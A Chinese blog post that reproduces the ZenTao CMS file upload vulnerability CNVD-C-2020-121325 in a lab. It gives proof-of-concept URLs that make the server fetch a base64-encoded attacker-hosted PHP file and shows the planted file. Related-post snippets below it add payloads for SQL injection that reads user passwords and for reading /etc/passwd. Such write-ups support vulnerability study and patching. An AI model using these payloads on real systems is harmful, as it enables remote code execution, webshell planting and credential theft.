禅道CMS文件上传漏洞(CNVD-C-2020-121325)

最新推荐文章于 2025-03-27 16:22:23 发布
最新推荐文章于 2025-03-27 16:22:23 发布
阅读量1w 收藏 9
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/109385695
版权
本文详细介绍了禅道CMS在12.4.2版本中存在的文件上传漏洞,该漏洞允许攻击者通过未严格过滤的link参数远程下载服务器上的恶意脚本,可能导致任意代码执行和webshell获取。复现过程包括利用base64编码的恶意文件地址,并在后台成功触发漏洞,最终在服务器上查看到上传的恶意PHP文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.影响版本

<=12.4.2

2.漏洞描述

       禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。

3.漏洞POC

1)http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html

2)http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]

4.复现准备:

远程服务器:192.168.157.136

恶意文件地址:http://192.168.157.136/test/test.php

test.php:

<?php echo "<?php phpinfo();?>";

5.漏洞复现

1)对http头使用大写,且对恶意文件地址base64加密

2)登录禅道后台,使用POC1方法

3)版本添加成功

4)在文件上传位置zentaopms\www\data\client\1查看上传的文件,在浏览器访问上传成功的test.php文件

 

研发项目管理系统命令注入漏洞(MPS-2023-0418)
murphysec的博客
01-09 1407
是一款国产开源项目管理软件。 研发项目管理系统存在系统命令注入漏洞,具有后台登陆权限的攻击者可以利用此漏洞执行任意命令,进而控制服务器。
0x03 ShowDoc 文件上传漏洞CNVD-2020-26585)复现
weixin_43263566的博客
08-22 1348
如果能成功访问就说明有可能存在漏洞,是否存在漏洞还需要后续进行上传测试。首先你可以编写个搜索fofa的脚本,用来收集目标ip。然后就可以编写ip验证脚本。
CMS 11.6漏洞
chaojixiaojingang
09-09 5144
一.SQL注入漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user 二.任意文件读取漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd 三.远程代码执行漏洞 1)远程代码执行命令phpnifo(); P
后台命令执行漏洞
最新发布
Palpitate_LL的博客
03-27 605
是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。后台存在 RCE 漏洞,均存在于历史版本,对这些漏洞进行复现分析。
CNVD/CVE】CNVD-C-2020-121325
ZXW_NUDT的博客
04-06 3408
CMS
后台文件上传(CNVD-C-2020-121325)
m0_65150886的博客
01-02 1652
CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。1.访问ip:port,自动跳转至登录页面。4.在本机上准备相关的木马程序。对url进行base64编码。5.本机启动http服务。登录之后,正常重置密码。利用poc远程下载文件。保存后,进入正式页面。升级12.4.3版本。
CNVD-C-2020-121325文件上传漏洞通告
爱国小白帽
10-27 2284
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102602 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-26 0x01 漏洞简述 2020年10月26日,360CERT监测发现 官方 发布了 文件上传漏洞 的风险通告,该漏洞编号为 CNVD-C-2020-121325漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件以及获得系统管理权限
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2...
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Apache Tomcat 文件包含漏洞CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
【组件攻击链】项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 5026
近年来漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
php案例分析百度云_<=12.4.2文件上传漏洞分析与复现
weixin_39552874的博客
12-18 277
1、前言百度云安全团队监测到官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325漏洞影响<=12.4.2版本。登陆管理后台的恶意攻击者可以通过fopen/fread/fwrite方法读取或上传任意文件,成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。我们对漏洞进行了复现和分析,由于需要登录后台才可以利用,实际风险相对较低,建议受影响...
(QVD-2024-15263)未授权漏洞
u013008898的博客
10-11 268
1.获取cookie值。
项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 4176
是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
身份认证绕过漏洞(QVD-2024-15263)复现
fly夏天的博客
06-19 3562
QVD-2024-15263 身份认证绕过漏洞复现和原理介绍。
漏洞复现】——未授权登入(QVD-2024-15263)
LongL_GuYu的博客
07-06 3736
(Zentao)是一款开源的项目管理和协作软件。项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。
项目管理系统身份认证绕过漏洞(QVD-2024-15263)
m0_46604997的博客
06-05 979
1.1、基本信息是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件,可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。提供多个版本,包括免费的开源版、付费的企业版、旗舰版、IPD版和云,以及DevOps平台版,满足不同行业和规模的项目管理需求。1.2、问题描述系统存在身份认证绕过,在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
深入解析Apache Tomcat文件包含漏洞(CVE-2020-1938)
**CNVD-2020-10487文件包含漏洞概述** CNVD-2020-10487,又称CVE-2020-1938,是Apache Tomcat中一个较为严重的安全漏洞。CVE(Common Vulnerabilities and Exposures)是一个致力于公开记录计算机系统漏洞的数据库...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值